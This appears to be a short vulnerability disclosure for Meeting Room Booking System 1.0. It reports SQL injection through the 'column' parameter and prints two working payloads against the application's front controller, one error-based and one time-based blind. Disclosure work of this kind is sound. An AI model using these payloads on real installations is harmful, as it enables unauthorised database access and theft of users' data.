Headline
Meeting Room Booking System 1.0 SQL Injection
Meeting Room Booking System version 1.0 suffers from multiple remote SQL injection vulnerabilities.
## Title: Meeting Room Booking System-1.0 Multiple - SQLi## Author: nu11secur1ty## Date: 09/06/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo## Reference: https://portswigger.net/web-security/sql-injection## Description:The column parameter appears to be vulnerable to SQL injectionattacks. The payload ' was submitted in the column parameter, and adatabase error message was returned. The attacker easily can steal allinformation from the database of this web application!WARNING! All of you: Be careful what you buy! This will be your responsibility!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: column (GET) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR) Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(SELECT6118 FROM(SELECT COUNT(*),CONCAT(0x716a717171,(SELECT(ELT(6118=6118,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&direction=ASC&page=1 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(CASEWHEN (6735=6735) THEN SLEEP(5) ELSE 6735 END)&direction=ASC&page=1---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Meeting-Room-Booking-System-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/meeting-room-booking-system-10-multiple.html)## Time spent:01:47:00